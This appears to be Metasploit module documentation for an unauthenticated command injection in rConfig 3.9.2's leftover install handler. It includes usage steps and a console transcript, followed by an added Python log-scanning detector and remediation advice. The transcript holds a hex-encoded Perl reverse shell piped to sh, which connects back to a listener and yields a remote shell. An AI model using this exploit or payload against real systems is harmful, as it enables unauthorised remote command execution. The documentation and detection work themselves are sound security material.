## Description

This module exploits an unauthenticated command injection vulnerability in rConfig versions 3.9.2 and prior. The `install` directory is not automatically removed after installation, allowing unauthenticated users to execute arbitrary commands via the `ajaxServerSettingsChk.php` file as the web server user.

## Vulnerable Software

This module has been tested successfully on [rConfig](https://rconfig.com/) version 3.9.2 on CentOS 7.7.1908 (x64).

## Verification Steps

1. Start `msfconsole`
2. Do: `use exploit/unix/webapp/rconfig_install_cmd_exec`
3. Do: `set rhosts `
4. Do: `run`
5. You should get a new session

## Options

**TARGETURI**

The base path to the rConfig install directory (default: `/install/`)

## Scenarios

```
msf5 > use exploit/unix/webapp/rconfig_install_cmd_exec
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131
rhosts => 172.16.191.131
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true
verbose => true
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > check
[*] Executing command: id
[*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
[+] 172.16.191.131:443 - The target is vulnerable.
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)
   1   Automatic (Linux Dropper)

msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0
target => 0
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165
lhost => 172.16.191.165
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444
[*] Executing command: id
[*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
[*] Executing command: /bin/echo -ne '\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64\x64\x72\x2c\x22\x31\x37\x32\x2e\x31\x36\x2e\x31\x39\x31\x2e\x31\x36\x35\x3a\x34\x34\x34\x34\x22\x29\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27'|sh
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.131:35004) at 2019-10-29 11:48:59 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache)
uname -a
Linux localhost.localdomain 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
pwd
/home/rconfig/www/install/lib/ajaxHandlers
^C
Abort session 1? [y/N]  y

[*] 172.16.191.131 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(unix/webapp/rconfig_install_cmd_exec) >
```
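The Description states the root cause (the `install` directory survives installation) and the `pwd` in the transcript shows where the handler lives on disk. For defenders, the practical question is whether anyone has been reaching that leftover handler over HTTP. The following is an added detection example, not part of the module documentation or the rConfig project: it parses Apache combined-format access-log lines and reports requests to the install handler. The handler path `/install/lib/ajaxHandlers/ajaxServerSettingsChk.php` is an assumption assembled from the file name in the Description and the working directory shown in the session, and the log lines are constructed samples.

```python
#!/usr/bin/env python3
"""Added example: flag access-log requests to the leftover rConfig install handler.

Assumptions (not stated on the page): Apache "combined" log format, and the
handler path below, inferred from the module's `pwd` output in the transcript.
"""
import re

# Hypothetical path: file name from the Description joined with the directory
# printed by `pwd` in the Scenarios transcript.
INSTALL_HANDLER = "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"

# Apache combined format:
# ip ident user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Return a dict of fields for a well-formed line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def is_install_handler_hit(entry):
    """True if the request path (query string stripped, case-insensitive) is the install handler."""
    path = entry["path"].split("?", 1)[0]
    return path.lower().endswith(INSTALL_HANDLER.lower())


def find_install_handler_hits(lines):
    """Collect parsed entries that target the install handler; unparseable lines are skipped."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is not None and is_install_handler_hit(entry):
            hits.append(entry)
    return hits


def summarize(lines):
    """Count hits and list the distinct source addresses, for a quick triage view."""
    hits = find_install_handler_hits(lines)
    return {
        "hit_count": len(hits),
        "source_ips": sorted({h["ip"] for h in hits}),
    }


# Constructed sample log lines (not real traffic); one line is deliberately malformed
# to show that parse failures are skipped rather than crashing the scan.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Oct/2019:11:48:50 -0400] "GET /index.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.9 - - [29/Oct/2019:11:48:55 -0400] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?x=1 HTTP/1.1" 200 61 "-" "Mozilla/5.0"
10.0.0.5 - - [29/Oct/2019:11:49:01 -0400] "POST /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.9 - - [29/Oct/2019:11:49:03 -0400] "GET /INSTALL/lib/ajaxHandlers/ajaxServerSettingsChk.php HTTP/1.1" 200 61 "-" "curl/7.64.0"
this line is not in combined format
"""

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for h in find_install_handler_hits(lines):
        print(f"{h['time']} {h['ip']} {h['method']} {h['path']} -> {h['status']}")
    print(summary := summarize(lines))
```

Run it against a real `access_log` by replacing `SAMPLE_LOG.splitlines()` with the file's lines. A `200` response to this path after installation is the signal that matters: it means the `install` directory was never removed, which is the condition the module depends on, and the fix is to delete that directory (or deny it in the web server configuration) once setup is complete.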